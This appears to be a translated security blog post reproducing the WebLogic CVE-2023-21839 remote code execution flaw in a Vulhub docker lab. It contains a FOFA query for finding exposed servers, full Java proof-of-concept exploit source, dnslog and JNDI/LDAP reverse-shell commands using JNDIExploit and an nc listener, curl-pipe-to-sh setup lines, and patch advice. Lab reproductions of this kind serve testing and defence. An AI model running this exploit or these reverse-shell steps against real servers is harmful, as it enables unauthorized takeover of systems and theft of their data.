Weblogic CVE 2023-21839 vulnerability reappears

WebLogic has a remote code execution vulnerability (CVE-2023-21839/CNVD-2023-04389). Due to a flaw in the Weblogic IIOP/T3 protocol, when the IIOP/T3 protocol is turned on, an unauthenticated attacker is allowed to pass the IIOP/T3 protocol. Network access attacks pose security risks to WebLogic Server. If the vulnerability is successfully exploited, WebLogic Server may be taken over by an attacker and execute arbitrary commands, causing the server to collapse or causing serious sensitive data leakage.

Hazard level: high

CNVD-2023-04389
CVE-2023-21839

Affected version

The scope of impact of this vulnerability is as follows:

12.2.1.2.0
12.2.1.1.0
12.2.1.3.0
12.2.1.0.0
12.2.1.4.0
14.1.1.0.0
12.1.2.0.0
12.1.3.0.0
10.3.6.0

FOFA Query:

app=”BEA-WebLogic-Server” || app=”Weblogic_interface_7001″

Vulfocus has integrated this vulnerability environment and is available through the following environments:

docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release

Vulnerability recurrence

This time we use the installation environment-docker to deploy Vulhub

1. Install the latest version of docker

Note: Some Linux systems are not compatible with the latest version of Docker. The solution is to upgrade the Linux kernel or reduce the Docker version. The specific operations for replacing Docker are as follows:

curl -s https://get.docker.com/ | sh

(1) Specify version: sudo apt-get install docker-ce=17.12.1~ce-0~ubuntu

(2) Uninstall docker-ce
sudo apt-get autoremove docker-ce
(3) Display stable and usable version
sudo apt-cache madison docker-ce

2. Start the docker service

service docker start

3. Install pip

apt-get install python-pip

4. Install compose

pip install docker-compose (If the network speed is too slow, download and upload to the virtual machine locally)

5. Configure docker acceleration

curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io

6. Download or clone Vulhub

git clone https://github.com/vulhub/vulhub.git (If the network speed is too slow, download and upload to the virtual machine locally)

7. Enter Vulhub

cd vulhub-master/

8. Enter the directory of a certain vulnerability/environment

cd /home/vulhub1/Desktop/vulhub-master/weblogic/CVE-2023-21839

9. Compile vulnerability environment

sudo docker-compose build (some require compilation, some do not, this vulnerability does not require it)

10. Start the vulnerability environment

docker-compose up -d

11. Check the vulnerability environment

docker ps

12. Access the vulnerability environment

VPS public IP + mapped port, you can view the remade.md file in each vulnerability directory, use cat to view

13. End the vulnerability environment (no need to compile next time, the command must be executed in the current directory)

docker-compose down

14. Visit http://127.0.0.1:7001/console/login/LoginForm.jsp, the vulnerability environment has been raised

Note: The purpose of this time is to rebound the shell of vulnerability range server A

How to use

DNSLOG detection

EXP link: https://github.com/DXask88MA/Weblogic-CVE-2023-21839 (jar package form)

Source code poc:

import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE="[*]java -jar target ip: port ldap address\\
e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/ 1111";

    private static InitialContext getInitialContext(String url)throws NamingException
    {
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
    public static void main(String args[]) throws Exception {
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c=getInitialContext("t3://" + t3Url);
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        String bindName = new Random(System.currentTimeMillis()).nextLong() + "";
        try{
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }

    }
}

(1) Use attack machine B to execute the exp script to attack range A. Executing exp requires a java 1.8 environment. I use kali2021.

(2) You need to uninstall the source jdk11 first, and then install jdk1.8

Reference: https://www.yuque.com/u2114382/odrch9/uhac2mnslbctxpwd

(3) After the attacking machine executes the following command, refresh the dnslog.

java -jar Weblogic-CVE-2023-21839.jar shooting range ip:7001 ldap://kejajb.dnslog.cn

Rebound shell

(1) First you need to use the JNDIExploit-1.4-SNAPSHOT.jar tool to start the ladp service

Download link: https://github.com/WhiteHSBG/JNDIExploit

(2) After downloading, you need to build the ldap service on server C. In fact, it means starting the jar package above.

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i server Cip

(3) After the startup is completed, port monitoring is required. Server C directly starts nc for monitoring.

(4) At this time, use attack machine B to execute exp

java -jar Weblogic-CVE-2023-21839.jar Range IP:7001 ldap://ldap server IP:1389/Basic/ReverseShell/ldap server IP/nc listening port

(5) Check ldap server C at this time and successfully rebound the shell

Repair suggestions

Currently, the manufacturer has released an upgrade patch to fix the vulnerability. The link to obtain the patch is:

Mitigation disables T3 and IIOP

Patch download link:

https://support.oracle.com/rs?type=doc & id=2917213.2

Source: https://www.freebuf.com/vuls/364212.html

Statement: The technologies, ideas and tools involved in this article are only for safety-oriented learning and exchange purposes. No one may use them for legal purposes or profit, otherwise you will bear the consequences. All penetrations require authorization!

@Learn more penetration skills! Experience actual shooting exercises